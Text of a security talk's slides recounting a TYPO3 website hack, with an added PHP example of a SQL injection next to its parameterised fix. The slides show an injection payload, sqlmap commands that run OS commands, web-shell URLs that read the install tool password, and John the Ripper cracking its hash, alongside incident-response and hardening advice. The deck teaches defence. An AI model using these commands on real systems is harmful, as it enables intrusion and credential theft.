Diary of a Hack
https://www.google.de/?q=exec_SELECTquery+%22You+have+an+error+in+your+SQL+syntax%22
Slide 29
Day 5 - Exploitation
Slide 30
Inspiring people to share
Vulnerabilities and Attacks
Excursion - SQLi
Slide 31
Excursion - SQLi
SELECT *
FROM tt_content
WHERE colPos = 0
Slide 32
'SELECT *
FROM tt_content
WHERE colPos = ' . $_GET['colPos']
Excursion - SQLi
Slide 33
Excursion - SQLi
Slide 34
'SELECT *
FROM tt_content
WHERE colPos = ' . $_GET['colPos']
Excursion - SQLi
Slide 35
'SELECT *
FROM tt_content
WHERE colPos = 0 or hidden = 1'
$_GET['colPos']
Excursion - SQLi
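The concatenated query from the slides next to a hardened version, as an added example that is not part of the deck. It runs against an in-memory SQLite table named like TYPO3's tt_content with constructed sample rows; the function names are mine.

```php
<?php
// Added example (not from the slides): the vulnerable concatenation from
// the deck beside a parameterised version, run against constructed data.
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE tt_content (uid INTEGER PRIMARY KEY, header TEXT, colPos INTEGER, hidden INTEGER)');
// Constructed sample rows: one visible element per column, one hidden draft.
$pdo->exec("INSERT INTO tt_content VALUES (1, 'Public teaser', 0, 0), (2, 'Sidebar box', 1, 0), (3, 'Unpublished draft', 2, 1)");

// The pattern on the slide: request data concatenated into the statement,
// so an OR clause in the value becomes part of the SQL.
function vulnerableSelect(PDO $pdo, string $colPos): array
{
    $sql = 'SELECT uid, header FROM tt_content WHERE colPos = ' . $colPos;
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: colPos is an integer by definition, so cast it, and bind it as
// a parameter so the value is always data and never statement text.
function safeSelect(PDO $pdo, string $colPos): array
{
    $stmt = $pdo->prepare('SELECT uid, header FROM tt_content WHERE colPos = :colPos');
    $stmt->bindValue(':colPos', (int) $colPos, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The value shown on the slide, as it would arrive in $_GET['colPos'].
$input = '0 or hidden = 1';
print_r(vulnerableSelect($pdo, $input)); // hidden rows from other columns included
print_r(safeSelect($pdo, $input));       // only colPos 0 after the cast
```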
Slide 36
Disclaimer
Slide 37
Don’t do this at home!
Slide 38
(unless you have written permission)
Slide 39
$ sqlmap -u 'http://security.dev/index.php?id=37&colPos=0' -p 'colPos'
GET parameter 'colPos' is vulnerable. Do you want to keep testing the others? [y/N]
sqlmap identified the following injection points with a total of 30 HTTP(s) requests:
Slide 40
The power of MySQL
Slide 41
$ sqlmap -u 'http://security.dev/index.php?id=37&colPos=0' -p 'colPos' \
--os-cmd='ls -al'
Slide 42
Slide 43
http://security.dev/tmpbrsru.php?cmd=touch%20typo3conf/ENABLE_INSTALL_TOOL
http://security.dev/typo3/sysext/install/Start/Install.php
http://security.dev/tmpbrsru.php?cmd=grep%20installToolPassword%20typo3conf/LocalConfiguration.php
Slide 44
$ john pw
Loaded 1 password hash (phpass MD5 [128/128 SSE2 intrinsics 4x4x5])
password (dummy)
guesses: 1 time: 0:00:00:01 DONE (Thu Jun 4 11:00:44 2015) c/s: 900
trying: 123456 - fishing
Slide 45
Slide 46
Day 5 - Discovery
Slide 47
Discovery
• Take site offline!
• seriously
• I mean it
Slide 48
Slide 49
Day 6 - Analysis
Slide 50
Analysis
• Make a backup of current state (files, DB, logs)
• Search all logs for „suspicious“ entries
• Find point of entry (security issue)
• If in doubt: get help
Slide 53
lib.sqliSearch = CONTENT
lib.sqliSearch {
  table = tt_content
  select.where = header like ###search###
  select.markers {
    search.data = GP:search
    search.wrap = %|%
  }
}
Slide 54
Fix
• Close security issue in Code/ Extension/ Core
• Restore from backup
• Or if you really know what you are doing: cleanup installation
• Go online again
• Plan improvements (education, monitoring, …)
Slide 55
Day 8 - Improve
Slide 56
Security of Web Applications
Lessons learned
• Development/ Testing Environment
• Deploy to Production
• Least privilege
• There is no Software without bugs. Be prepared!
Slide 57
Best Practice
• Operations
  • Regular updates
  • Backups
  • Monitoring
• Development
  • Peer Reviews (TypoScript, Code, Templates)
  • (automated) Tests
• Focus
  • Education
  • Allocate time for all of the above
Slide 58
Questions?
Slide 59
Resources
• http://docs.typo3.org/typo3cms/SecurityGuide/
• http://sqlmap.org
• http://www.openwall.com/john/
• https://www.owasp.org/